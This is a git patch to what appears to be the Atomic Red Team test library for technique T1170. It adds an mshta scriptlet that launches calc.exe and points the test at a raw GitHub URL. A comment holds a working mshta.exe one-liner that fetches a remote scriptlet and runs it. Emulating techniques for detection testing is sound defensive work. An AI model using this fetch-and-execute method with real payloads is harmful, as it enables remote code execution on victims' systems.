From 106bb4b08f725c72968bbe4ec90cab6114c103ea Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?J=C3=B6rgen=20Maas?= <jorgen.maas@gmail.com>
Date: Tue, 12 Jun 2018 09:17:37 +0200
Subject: [PATCH] Make T1170 self-contained; add payload and provide working
 URL's.

---
 atomics/T1170/T1170.yaml |  2 +-
 atomics/T1170/mshta.sct  | 29 +++++++++++++++++++++++++++++
 2 files changed, 30 insertions(+), 1 deletion(-)
 create mode 100644 atomics/T1170/mshta.sct

diff --git a/atomics/T1170/T1170.yaml b/atomics/T1170/T1170.yaml
index 47916540..c2cc3b93 100644
--- a/atomics/T1170/T1170.yaml
+++ b/atomics/T1170/T1170.yaml
@@ -12,7 +12,7 @@ atomic_tests:
     file_url:
       description: location of the payload
       type: Url
-      default: https://www.example.com/mshta.sct
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct
   executor:
     name: command_prompt
     command: |
diff --git a/atomics/T1170/mshta.sct b/atomics/T1170/mshta.sct
new file mode 100644
index 00000000..a5bf6537
--- /dev/null
+++ b/atomics/T1170/mshta.sct
@@ -0,0 +1,29 @@
+<?XML version="1.0"?>
+<scriptlet>
+  <!-- Test -->
+  <!-- mshta.exe javascript:a=(GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct")).Exec();close(); -->
+
+<registration
+    description="Bandit"
+    progid="Bandit"
+    version="1.00"
+    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
+	>
+
+</registration>
+
+<public>
+    <method name="Exec"></method>
+</public>
+<script language="JScript">
+<![CDATA[
+
+	function Exec()
+	{
+		var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+	}
+
+]]>
+</script>
+
+</scriptlet>